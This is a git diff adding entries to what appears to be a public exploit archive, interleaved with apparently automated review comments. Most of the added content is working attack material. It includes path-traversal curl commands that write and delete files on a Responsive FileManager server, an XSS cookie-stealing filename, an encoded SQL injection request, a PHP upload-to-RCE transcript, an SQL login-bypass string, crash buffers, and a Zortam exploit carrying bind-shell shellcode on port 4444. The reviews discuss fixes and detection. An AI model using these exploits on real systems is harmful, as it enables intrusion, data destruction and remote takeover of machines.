+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+
+3. Arbitrary file write via path traversal mitigation bypass through `create_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.txt&new_content=Hacked" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=create_file"
+$ ls /tmp
+hacked.txt
+
+4. Arbitrary file deletion via path traversal mitigation bypass through `delete_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/hacked.txt" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_file"
+
+5. Arbitrary directory deletion via path traversal mitigation bypass through `delete_folder` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../filemanager" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_folder"
+
+6. Arbitrary file write (only with jpg/jpeg/png extension) with `path` parameter through `save_img` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../tmp/&name=hacked.jpg&url=http://s3.amazonaws.com/feather-files-aviary-prod-us-east-1/2444282ef4344e3dacdedc7a78f8877d/2018-10-23/44f0f34961464feb92b53d953b02d4bb.jpg" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=save_img"
+$ ls /tmp
+hacked.jpg
+
+7. Persistent XSS in `media_preview` action.
+
+Upload a file with valid media extension (e.g. mp3) with XSS payload in the name. For example, "a\"%2balert(document.cookie)%2b\"".mp3 will trigger `alert(document.cookie)` when previewed.
\ No newline at end of file
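Review bot: The advisory has no remediation section, although its own text says the issues were found "before v 9.14.0". A closing line such as `Fix: upgrade to Responsive FileManager 9.14.0 or later` (to be confirmed against the vendor changelog) would give readers the patched version. Items 3 to 5 say the traversal mitigation is bypassed "by using an array" without saying why; presumably the path check runs only on the scalar `path` parameter and not on `paths[]`, and stating the root cause would tell maintainers of forks what to fix. Every request carries a `PHPSESSID`, so the text should also say up front whether an authenticated session is required.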
diff --git a/exploits/php/webapps/45992.html b/exploits/php/webapps/45992.html
new file mode 100644
index 000000000..7cbefe60d
--- /dev/null
+++ b/exploits/php/webapps/45992.html
@@ -0,0 +1,20 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery
+# Date: 2018-12-13
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+
+# 1 Poof Of Concept (Change password):
+
+
+
+
+
\ No newline at end of file
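Review bot: `# Version: v1 (REQUIRED)` still carries the submission template's "(REQUIRED)" marker, and "Poof Of Concept" should read "Proof Of Concept". The header names neither the affected page nor what the server fails to check; a line such as `# Description: the password-change request is accepted without an anti-CSRF token` (wording to be confirmed by the author) would make the finding usable for whoever has to patch it. The markup after the header is blank as shown on this page, probably lost in capture.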
diff --git a/exploits/php/webapps/45994.txt b/exploits/php/webapps/45994.txt
new file mode 100644
index 000000000..d8d310847
--- /dev/null
+++ b/exploits/php/webapps/45994.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+#
+
+GET /[PATH]/reviews/campaign_add.php?id=%2d%31%27%20%20%55%4e%49%4f%4e+%53%45%4c%45%43%54+1,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29,3,4,5,%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33,24,25,%32%36%2c%32%37%2c%32%38%2c%32%39,30--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:09:22 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
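Review bot: The write-up does not say whether the `id` parameter of `campaign_add.php` is reachable without logging in; the captured request carries a `PHPSESSID` cookie, which suggests an authenticated session, and that changes the severity a defender should assign. A header line such as `# Authentication: required / not required` should settle it. The captured response stops at the headers, so nothing in the file shows what the server returned, and no remediation (a parameterized query for `id`) is mentioned. exploits/php/webapps/45995.txt repeats the same `# POC:` header lines although its request targets `action.php`.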
diff --git a/exploits/php/webapps/45995.txt b/exploits/php/webapps/45995.txt
new file mode 100644
index 000000000..705f14ef2
--- /dev/null
+++ b/exploits/php/webapps/45995.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+#
+
+POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/octet-stream
+Content-Length: 922
+Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------4704926813981: undefined
+Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
+
+-----------------------------4704926813981
+Content-Disposition: form-data; name="hidden_photo"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="name"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="rating"
+4.5
+-----------------------------4704926813981
+Content-Disposition: form-data; name="review"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="date"
+12/14/2018
+-----------------------------4704926813981
+Content-Disposition: form-data; name="id"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="submit"
+submit
+-----------------------------4704926813981--
+HTTP/1.1 302 Found
+Date: Fri, 14 Dec 2018 18:17:48 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: custom_reviews.php
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/reviews/custom_reviews.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:17:49 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
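Review bot: The `# POC:` comment near the top of this file still names `campaign_add.php?id=[SQL]`, which belongs to the SQL injection entry, while the transcript below it posts to `action.php?action=custom_reviews`; the comment should read `# http://localhost/[PATH]/reviews/action.php?action=custom_reviews`. The transcript also looks damaged in capture: the request declares `Content-Type: application/octet-stream` although the body is multipart form data, and the first boundary line ends in `: undefined`. On the defensive side, the exchange shows a `.php` filename being accepted and then served from `reviews/uploads/`, so the remedies to check for are an extension/type allow-list in the upload handler and PHP execution disabled for the uploads directory.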
diff --git a/exploits/php/webapps/45997.txt b/exploits/php/webapps/45997.txt
new file mode 100644
index 000000000..2823943c2
--- /dev/null
+++ b/exploits/php/webapps/45997.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
+# Date: 2018-12-08
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+http://traget/admin/index.php
+
+username: '=''or'
+
+Password: '=''or'
\ No newline at end of file
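Review bot: The target line reads `http://traget/admin/index.php` (typo for `target`), and `# Version: v1 (REQUIRED)` still carries the submission template's `(REQUIRED)` marker. The entry also gives no description of the flaw itself. Because the same quote-based string is entered in both the username and password fields, the login query presumably interpolates both values directly (inferred; no source is shown), and one sentence stating that, together with the remedy of prepared statements and a hashed-password comparison done in code, would make the entry usable for whoever has to patch the script.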
diff --git a/exploits/windows/dos/45993.py b/exploits/windows/dos/45993.py
new file mode 100755
index 000000000..ef7ea778f
--- /dev/null
+++ b/exploits/windows/dos/45993.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python
+# -*- coding: cp1252 -*-
+# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
+# Author: Fernando Cruz
+# Date: 13/12/2018
+# Vendor Homepage: https://angryip.org
+# Tested Version: 3.11
+# Tested on Windows 10 Pro, 64-bit
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python angryip.py
+# 2.- Open angryip.txt and copy content to clipboard
+# 3.- Open Angry IP Scanner
+# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
+# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
+# 6.- Crashed
+
+buffer = "\x41" * 44455293
+f = open("angryip.txt" , 'w')
+f.write(buffer)
+f.close()
\ No newline at end of file
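Review bot: The header disagrees with itself about the affected build: the title says `Angry IP Scanner 3.5.3` while `# Tested Version: 3.11` names a different release, so a reader cannot tell which version to check or patch. One of the two should be corrected, and the menu labels in steps 4 and 5 come from the Spanish UI and would be easier to follow with the English names alongside. On style, `buffer` shadows a Python 2 builtin and the handle is closed by hand; `with open("angryip.txt", "w") as f: f.write(payload)` is the idiomatic form.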
diff --git a/exploits/windows/dos/45996.py b/exploits/windows/dos/45996.py
new file mode 100755
index 000000000..b230798ea
--- /dev/null
+++ b/exploits/windows/dos/45996.py
@@ -0,0 +1,27 @@
+# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
+# Discovery by: Francisco Ramirez
+# Discovery Date: 2018-12-14
+# Vendor Homepage: https://www.ultraiso.com/
+# Software Link : https://www.ultraiso.com/download.html
+# Tested Version: 9.7.1.3519
+# Tested on: Windows 10 Pro - 64 bit
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python UltraISO_9.7.1.3519.py
+# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
+# 3.- Open UltraISO_9.7.1.3519
+# 4.- In the Window select 'Tools' > 'Make CD/DVD Image'
+# 5.- In the field 'Output FileName' remove the default path.
+# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
+# 7.- Click 'Make' and you will see a crash.
+
+#!/usr/bin/env python
+
+a_letters = "\x41" * 304
+seRecord = "\x42" * 4
+sehRecord = "\x43" * 4
+buffer = a_letters + seRecord + sehRecord
+f = open ("UltraISO_9.7.1.3519.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
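Review bot: The `#!/usr/bin/env python` line is the 19th line of the new file, after the comment header, so it is an ordinary comment and has no effect even though the file is added with mode 100755; it has to be the first line to act as an interpreter line. On style, `buffer` shadows a Python 2 builtin, and `f = open (...)` followed by `f.close()` is better written as `with open("UltraISO_9.7.1.3519.txt", "w") as f: f.write(payload)` so the handle is closed on error as well.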
diff --git a/exploits/windows/local/45988.py b/exploits/windows/local/45988.py
new file mode 100755
index 000000000..12fc88a39
--- /dev/null
+++ b/exploits/windows/local/45988.py
@@ -0,0 +1,89 @@
+#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
+#Version: 24.15
+#Exploit Author: Manpreet Singh Kheberi
+#Date: December 13 2018
+#Download Link: https://www.zortam.com/download.html
+#Vendor Homepage: https://www.zortam.com
+#Tested on: Windows Xp Sp3 x64
+#Type: Bind shell
+print "-----------------------------------------------------------------------------------------------------------------------"
+print " Zortam MP3 media studio Exploit (SEH) "
+print " by Manpreet Singh Kheberi "
+print "Generated File zortam-exploit.txt "
+print "INSTRUCTIONS:"
+print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
+print "-----------------------------------------------------------------------------------------------------------------------"
+
+
+filename = "zortam-exploit.txt"
+junk = "\x41"*268
+nseh="\x90\x90\xeb\x12"
+
+seh ="\x8e\x32\xb5\x02"
+
+nop="\x90"*19
+brk="\x90\x90\x90\x90"
+
+# bind shell generated using metasploit
+#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
+# This will open a bind shell on port 4444
+# use ncat Target-IP 4444
+
+buf = ""
+buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33"
+buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30"
+buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26"
+buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb"
+buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f"
+buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7"
+buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35"
+buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad"
+buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d"
+buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33"
+buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79"
+buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d"
+buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1"
+buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed"
+buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e"
+buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd"
+buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35"
+buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4"
+buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69"
+buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29"
+buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3"
+buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09"
+buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4"
+buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f"
+buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0"
+buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c"
+buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12"
+buf += "\x68\x33\x89\x37"
+
+#boom+= "\xCC\xCC\xCC\xCC"
+#calc.exe
+
+
+# Used for initial exploit development phase
+bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
+bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
+bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
+bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
+bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
+bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
+bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
+bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
+bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
+bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
+bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
+bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
+bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
+bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
+bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
+bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
+
+
+
+exploit = junk+nseh+seh+nop+brk+buf
+textfile = open(filename,"w")
+textfile.write(exploit)
+textfile.close()
\ No newline at end of file
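Review bot: The `bchar` table is dead code: the final `exploit = junk+nseh+seh+nop+brk+buf` never includes it, and its literals have lost their backslashes (`"x01x02..."`), so it is plain text rather than a byte range. Together with the leftover `#boom+= ...` and `#calc.exe` comments, which contradict the `#Type: Bind shell` header, it should be deleted so the file matches its own description. The `buf` bytes are documented only by the comment naming the generator command, and nothing on the page lets a reader confirm they correspond to it. `#Tested on: Windows Xp Sp3 x64` also looks inconsistent, since to my knowledge SP3 was only released for 32-bit XP. For detection, the header and the printed instructions both state the outcome is a listener on TCP 4444 opened from the Zortam process, which is the behaviour to alert on.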
diff --git a/files_exploits.csv b/files_exploits.csv
index fa00ac936..8bc6ca9b2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6212,6 +6212,8 @@ id,file,description,date,author,type,platform,port
45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows,
45983,exploits/linux/dos/45983.txt,"Linux - 'userfaultfd' Bypasses tmpfs File Permissions",2018-12-13,"Google Security Research",dos,linux,
45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
+45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
+45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10145,6 +10147,7 @@ id,file,description,date,author,type,platform,port
45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
+45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17002,6 +17005,8 @@ id,file,description,date,author,type,platform,port
45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
+45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
+45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38035,7 +38040,7 @@ id,file,description,date,author,type,platform,port
43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
-43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
+43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
@@ -40480,3 +40485,11 @@ id,file,description,date,author,type,platform,port
45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80
45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,
+45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,
+45989,exploits/multiple/webapps/45989.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure",2018-12-14,alt3kx,webapps,multiple,
+45990,exploits/multiple/webapps/45990.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)",2018-12-14,alt3kx,webapps,multiple,
+45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,
+45992,exploits/php/webapps/45992.html,"Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)",2018-12-14,Veyselxan,webapps,php,
+45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
+45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
+45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,